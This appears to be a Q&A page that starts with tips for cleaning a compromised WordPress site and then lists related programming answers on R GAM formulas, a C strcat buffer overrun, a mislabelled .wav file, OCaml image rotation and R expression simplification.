run virus scan & malware scan
make sure your pc is clean
reinstall FTP client (clean install - download new version of software)
now to clean your WP website.
- install WP plugins (tac, exploit scanner)
- run plugins
- note infected files
- use FTP or WP plugin editor to clean these files
- run exploit scanner & tac till website is clean
Hope this helps...
Related
I want to run a hieratchical GAM in the mgcv package using the gam function. I used the same form of model in brms without problem and I will eventually re-run the same model in brms, but the deadline for an abstract submission in Sunday so I want to try the model in mgcv to have quicker results.
My formula:
f = MDS1 ~ 1 + exposed + s(YEAR,bs = "tp")+ s(LEVEL, bs = "tp") +
t2(YEAR, SITE, bs = c("tp","re")) + s(INTERTIDAL_TRANSECT, bs = "re",
m = 1)
My data:
Classes ‘data.table’ and 'data.frame': 3992 obs. of 9 variables:
$ unique_id : chr "Babb's Cove-1-0-1988" "Babb's Cove-1-0-1989" "Babb's Cove-1-0-1990" "Babb's Cove-1-0-1992" ...
$ MDS1 : num -0.607 -0.607 -0.607 -0.607 -0.607 ...
$ MDS2 : num 0.19 0.19 0.19 0.19 0.19 ...
$ MDS3 : num 0.36 0.36 0.36 0.36 0.36 ...
$ SITE : chr "Babb's Cove" "Babb's Cove" "Babb's Cove" "Babb's Cove" ...
$ INTERTIDAL_TRANSECT: Factor w/ 21 levels "1","2","5","7",..: 1 1 1 1 1 1 1 1 1 1 ...
$ LEVEL : num 0 0 0 0 0 0 0 1 1 1 ...
$ YEAR : num 1988 1989 1990 1992 1994 ...
$ exposed : Factor w/ 2 levels "1","2": 2 2 2 2 2 2 2 2 2 2 ...
- attr(*, ".internal.selfref")=<externalptr>
- attr(*, "sorted")= chr "unique_id"
I have 2 questions:
a)
When I try to fit the model with fit_count <- gam(f, data = count_merge, method = "REML", family = gaussian()) I get :
Error in names(dat) <- object$term :
attribut 'names' [2] doit être de même longueur que le vecteur [1]
I think it's something with the t2() argument of the formula.
b)
I usually run GAM with brms and my formula for that model was :
MDS1 ~ 1 + exposed + s(YEAR,bs = "tp")+ s(LEVEL, bs = "tp") + t2(YEAR, SITE, bs = c("tp","re"), full = T) +(1|r|INTERTIDAL_TRANSECT),
family = gaussian()
Is my way to adapt the formula to mgcv::gam OK?
Q a)
Your SITE vector is a character vector and it is required to be a factor.
Q b)
That looks OK, but you don't need the m = 1 in the s(INTERTIDAL_TRANSECT, bs = "re") term.
You should also use the full = TRUE option on the t2() term if you want the parameterisation to be the same between your {brms} call the {mgcv} one.
I am using Arch Linux and when I am compiling and running the following C code,
#include <stdio.h>
#include<string.h>
int main(void) {
char s1[]="Hello";
char s2[]="World";
strcat(s1,s2);
int s2_len=strlen(s2);
printf("s1 = %s, s2 = %s and length of s2 = %d.\n", s1, s2, s2_len);
return 0;
}
I am getting the output:
s1 = HelloWorld, s2 = orld and length of s2 = 4.
Although the output shoud be s1 = HelloWorld, s2 = World and length of s2 = 5. and it is the output when I am using some online IDE.
Can somebody explain me why is this happening?
char s1[]="Hello";
char s2[]="World";
strcat(s1,s2);
The variable declarations allocate memory for 5 characters each, plus the terminating NUL byte. Your strcat call writes past that space, which produces undefined results.
In this case, the memory layout is probably something like this
0 1 2 3 4 5 6 7 8 9 10 11
H e l l o \0 W o r l d \0
^ ^
s1 s2
After the strcat, the result is:
0 1 2 3 4 5 6 7 8 9 10 11
H e l l o W o r l d \0 \0
^ ^
s1 s2
Which gives the result you see. Note that there could be other possible results, the program could e.g. crash at the strcat call.
Is there any tool that helps with fixing a .wav file header other than Audacity?
The file is playing pure noise on audacity and doesn't open in other applications at all.
I believe the header is corrupted and not sure which value to use for "offset".
Here is a sample file: .wav corrupted file download 4 mgb
Here is another file just to confirm:
Another corrupted .wav file 35 mgb
To get a grip on an unknown binary file its always good advice to pop it open using a hex editor ... https://www.wxhexeditor.org/
The file looks to be a binary dump of some web page ... notice the right column showing HTML
or issue this terminal command to render each byte in boolean and its ASCII counterpart
xxd -b name_of_given_binary_file
00000000: 00111100 00100001 01000100 01001111 01000011 01010100 <!DOCT
00000006: 01011001 01010000 01000101 00100000 01101000 01110100 YPE ht
0000000c: 01101101 01101100 00111110 00001010 00111100 00100001 ml>.<!
00000012: 00101101 00101101 01011011 01101001 01100110 00100000 --[if
00000018: 01101100 01110100 01100101 00100000 01001001 01000101 lte IE
0000001e: 00100000 00111000 01011101 00111110 00111100 01101000 8]><h
00000024: 01110100 01101101 01101100 00100000 01100011 01101100 tml cl
0000002a: 01100001 01110011 01110011 00111101 00100010 01101110 ass="n
00000030: 01100111 00101101 01100011 01110011 01110000 00100000 g-csp
od -a name_of_given_binary_file # octal dump is handy here too
0000000 < ! D O C T Y P E sp h t m l > nl
0000020 < ! - - [ i f sp l t e sp I E sp 8
0000040 ] > < h t m l sp c l a s s = " n
0000060 g - c s p sp i e sp i e 8 sp l t e
I'm reading the documentation for the Graphics module, and there isn't any information on loading images from a file, only from a colour array. How would I go about doing this? For example, suppose I have file.png, and I want to draw it at co-ordinates (x, y) with z degrees rotation.
The camlimages library can load png files (if they are not represented in RGBA or CMYK format). A simple example:
open Images
let () = Graphics.open_graph "";;
let img = Png.load "png.png" [];;
let g = Graphic_image.of_image img;;
Graphics.draw_image g 0 0;;
Unix.sleep 10;;
To run:
opam install graphics camlimages
ocamlfind ocamlc -o test -package graphics -package unix \
-package camlimages.png -package camlimages.graphics \
-linkpkg test.ml
wget https://bytebucket.org/camlspotter/camlimages/raw/1611545463f493462aeafab65839c1112162559a/test/images/png.png
./test
(Based on the example in the library source code.)
But, I don't think camlimages can rotate pngs. You could roll your own rotate function (adapted from Mortimer's code on Dr. Dobb's):
let rotate src dst angle =
let sh, sw = Array.(float (length src), float (length src.(0))) in
let dh, dw = Array.(length dst, length dst.(0)) in
let dx, dy = float dw /. 2., float dh /. 2. in
let scale = min (float dh /. sh) (float dw /. sw) in
let duCol = sin(-.angle) *. (1. /. scale) in
let dvCol = cos(-.angle) *. (1. /. scale) in
let rec col dst x u v =
if x < dw then (
dst.(x) <- if (0. <= u && u < sw) && (0. <= v && v < sh)
then src.(truncate v).(truncate u)
else Graphics.white;
col dst (x + 1) (u +. dvCol) (v -. duCol))
in
let rec row y rowu rowv =
if y < dh then (col dst.(y) 0 rowu rowv;
row (y + 1) (rowu +. duCol) (rowv +. dvCol))
in
row 0 ((sw /. 2.) -. (dx *. dvCol +. dy *. duCol))
((sh /. 2.) -. (dx *. (-.duCol) +. dy *. dvCol))
And call it from the example code above with
let dg = Graphics.dump_image g
let dgr =Array.(make_matrix (length dg) (length dg.(0)) Graphics.white);;
rotate dg dgr (4. *. atan 1. /. 2);;
let g = Graphics.make_image dgr;;
Or, you could use something like the Sdlgfx.rotozoomSurface function of OCamlSDL.
A simple example:
let png = Sdlloader.load_image "png.png"
let png_rot = Sdlgfx.rotozoomSurface png 45.0 1.0 true;;
Sdl.init [`VIDEO];;
let screen = Sdlvideo.set_video_mode ~w:250 ~h:166 [];;
Sdlvideo.(blit_surface ~dst_rect:{ r_x = 0; r_y = 0; r_w = 250; r_h = 166}
~src:png_rot ~dst:screen ());;
Sdlvideo.flip screen;
Sdltimer.delay 10000;
Sdl.quit ();;
After installing the appropriate SDL packages on your system (not always easy...), to run:
opam install ocamlsdl
ocamlfind ocamlc -o test -package sdl -package sdl.sdlimage \
-package sdl.sdlgfx -linkpkg test.ml
./test
I have many formula strings similar to this:
str <- "( (( A ) * J ) - (( J ) * G ) ) / Z "
There are many parentheses which don't need to be there, (A*J - J*G)/Z is sufficient. Is there a function or package in R that can take care of this?
I tried functions for R expressions and as well as.formula but did not find what I need.
We can use R parser to do the job. The trick is that R knows when parentheses are needed based on the parse tree, so we can simply remove them from the tree:
See this:
simplify <- function(e)
{
if( mode(e) %in% c("name","numeric") ) return(e)
op <- as.character(e[[1]])
if( op == "(" ) return(simplify(e[[2]]))
if( op %in% c("+","-","*","/","^") ) return(call(op, simplify(e[[2]]), simplify(e[[3]])))
}
simplifytext <- function(s) deparse(simplify(parse(text=s)[[1]]))
Inputs:
str <- "( (( A ) * J ) - (( J ) * G ) ) / Z "
str2 <- gsub("-", "/", gsub("*", "+", str, fixed=TRUE))
Results:
> str2
[1] "( (( A ) + J ) / (( J ) + G ) ) / Z "
> simplifytext(str)
[1] "(A * J - J * G)/Z"
> simplifytext(str2)
[1] "(A + J)/(J + G)/Z"
Here are a couple of approaches:
R parsing
rmParen <- function(e) {
if (length(e) > 1) {
if (identical(e[[1]], as.symbol("("))) e <- e[[2]]
if (length(e) > 1) for (i in 1:length(e)) e[[i]] <- Recall(e[[i]])
}
e
}
s <- "( (( A ) * J ) - (( J ) * G ) ) / Z "
rmParen(parse(text = s)[[1]])
The last line returns:
(A * J - J * G)/Z
This works in all cases I tried but you might want to test it out a bit more.
If you want a character string as the return value then use deparse as in deparse(rmParen(parse(text = s)[[1]])). Note that deparse has a width.cutoff argument which is set to 60 by default but can be set to be larger if the actual expressions exceed that length.
Ryacas
library(Ryacas)
s <- "( (( A ) * J ) - (( J ) * G ) ) / Z "
Simplify(s)
The last line returns:
expression((A - G) * J/Z)
Note that its actually the print method that invokes the computation so if you want to save it then try yacas(Simplify(s))$text or as.character(yacas(Simplify(s))) .
ADDED: Ryacas solution.